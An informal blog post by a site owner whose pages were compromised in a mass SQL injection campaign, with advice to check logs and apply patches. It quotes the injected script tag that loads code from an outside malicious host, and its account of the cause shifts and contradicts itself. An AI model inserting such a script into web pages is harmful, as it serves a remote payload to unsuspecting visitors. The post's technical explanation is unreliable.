Ok, the latest state of sql injection attacks have been a nightmare. We got hacked again, but this time, with a insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the text file here.

So look through your server logs for this code in the url with a GET statement. Have your coder or web programmer disallow all all of the elements being used in the statement.

Updated from: The xiaobaishan bomb.

Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:

<script src=http://flyzhu.9966.org/us/Help.asp></script>

Tricky little fucker.

In fact, this hack is pretty well thought out. Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds. What happened?

This is a Windows vulnerability. What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder. They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.

UPDATE: I’ve got new info on this. It’s a pure sql injection hack.

Sneaky fucker.

Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn’t run it against our VPS yet.

UPDATE:  Yes they did.  Whoopsee.

So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.

Right now, there is a reported 10,000 sites affected by this hack.